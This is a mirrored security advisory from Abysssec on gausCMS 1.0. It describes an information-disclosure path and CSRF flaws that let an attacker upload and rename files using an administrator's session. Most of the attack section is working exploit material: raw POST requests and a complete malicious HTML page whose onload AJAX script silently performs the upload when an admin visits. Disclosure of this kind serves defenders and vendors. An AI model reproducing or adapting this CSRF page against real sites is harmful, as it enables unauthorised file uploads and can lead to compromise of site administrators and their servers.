扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 |
''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub-21-gauscms-multiple-vulnerabilities/ ''' Abysssec Inc Public Advisory Title:gausCMS Multiple Vulnerabilities Affected Version :Gaus CMS version 1.0 Discovery:www.abysssec.com Vendor :http://www.gaustudio.com/gausCMS.html Download Links :http://sourceforge.net/projects/gauscms/ Description : =========================================================================================== This version of gausCMS have Multiple Valnerabilities : 1- Access to Admin's Login and Information Disclosure 2- CSRF Upload arbitrary file and rename file Access to Admin's Section and Information Disclosure: =========================================================================================== With this path you can easily access to Admin's Login: http://Example.com/admin_includes/template/languages/english/english.txt Vulnerable Code: http://Example.com/default.asp Ln 37: Set oFile = FSO.GetFile(PATHADMIN & "admin_includes/template/languages/" & GUILanguage & "/" & GUILanguage & ".txt") CSRF Upload arbitrary file and rename file =========================================================================================== With send a POST request to this path, you can upload arbitrary file of course by Admin's cookie and by CSRF technique. http://Example.com/default.asp?dir=&toDo=uploadFile For example you can feed this POST Request to Admin : POST http://Example.com/default.asp?dir=&toDo=uploadFile HTTP/1.1 Host: Example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://Example.com/default.asp?dir=&toDo=uploadFile Cookie: Skin=default; ASPSESSIONIDQSASTTBS=EIPNNJIAKDDEAGDKACICOBHJ Content-Type: multipart/form-data; boundary=---------------------------287032381131322 Content-Length: 306 Message Body: -----------------------------287032381131322 Content-Disposition: form-data; name="attach1"; filename="Test.txt" Content-Type: text/plain 123 -----------------------------287032381131322 Content-Disposition: form-data; name="toDo" Upload File -----------------------------287032381131322-- ---------------------------------------------------------------------------------- With the same method we can rename files with following path: http://Example.com/default.asp?dir=&file=Test2.txt&toDo=Rename%20File For example you can feed this POST Request to Admin: POST http://Example.com/default.asp?dir=&file=Test.txt&toDo=Rename%20File HTTP/1.1 Host: Example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://Example.com/default.asp?dir=&file=Test2.txt&toDo=rename Cookie: Skin=default; ASPSESSIONIDQSASTTBS=IIPNNJIANIKOIKGOGOIKAJGE Content-Type: application/x-www-form-urlencoded Content-Length: 39 Message Body: newFileName=Test2.txt&toDo=Rename+File The Source of HTML Page (Malicious Link) for Upload Arbitrary file =========================================================================================== With this page, we send a POST request with AJAX to upload a file with Admin's Cookie. <html> <head> <title >Wellcome to gausCMS!</title> Hello! ... ... ... This page uploads a file <script> var binary; var filename; function FileUpload() { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) { } var http = false; if (window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http = new ActiveXObject("Microsoft.XMLHTTP"); } var url = "http://Example.com/default.asp?dir=&toDo=uploadFile"; var filename = 'Test.txt'; var filetext = ' 123 '; var boundaryString = '---------------------------287032381131322'; var boundary = '--' + boundaryString; var requestbody = boundary + '\n' + 'Content-Disposition: form-data; name="attach1"; filename="' + filename + '"' + '\n' + 'Content-Type: text/plain' + '\n' + '\n' + filetext + '\n' + boundaryString + 'Content-Disposition: form-data; name="toDo"' +'Upload File' + '\n' + boundary; http.onreadystatechange = done; http.open('POST', url, true); http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString); http.setRequestHeader("Connection", "close"); http.setRequestHeader("Content-length", requestbody.length); http.send(requestbody); } function done() { if (http.readyState == 4 && http.status == 200) { //alert(http.responseText); //alert('Upload OK'); } } </script> </head> <body onload ="FileUpload();"> </body> </html> =========================================================================================== |
体验盒子
